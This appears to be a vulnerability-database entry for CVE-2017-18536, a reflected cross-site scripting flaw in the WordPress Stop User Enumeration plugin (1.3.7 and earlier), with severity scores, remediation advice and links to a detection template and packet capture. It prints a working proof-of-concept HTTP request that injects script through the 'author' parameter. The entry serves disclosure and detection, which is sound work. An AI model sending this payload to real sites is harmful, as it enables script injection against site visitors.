🔙 목록으로 돌아가기

CVE-2017-18536: WordPress Stop User Enumeration <=1.3.7 - Cross-Site Scripting

TitleWordPress Stop User Enumeration <=1.3.7 - Cross-Site Scripting
Authordaffainfo
SeverityMedium
ImpactThis vulnerability allows remote attackers to execute arbitrary script or HTML code in the context of the victim's browser, potentially leading to session hijacking, phishing attacks, or defacement of the affected website.
RemediationUpdate to the latest version of the WordPress Stop User Enumeration plugin or apply the provided patch to fix the vulnerability.
CVSS Score6.1
EPSS Score0.05223
CVE IDCVE-2017-18536
CWE IDCWE-79
Tags cve2017 cve wpscan wordpress xss wp-plugin fullworks vuln

🔍 Vulnerability Description

WordPress Stop User Enumeration 1.3.7 and earlier are vulnerable to unauthenticated reflected cross-site scripting.

🌐 HTTP Request

GET /?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.8.1 Mobile/15E148 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2017/CVE-2017-18536.yaml

🦈 Packet Capture: ⬇️ Download cve-2017-18536.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A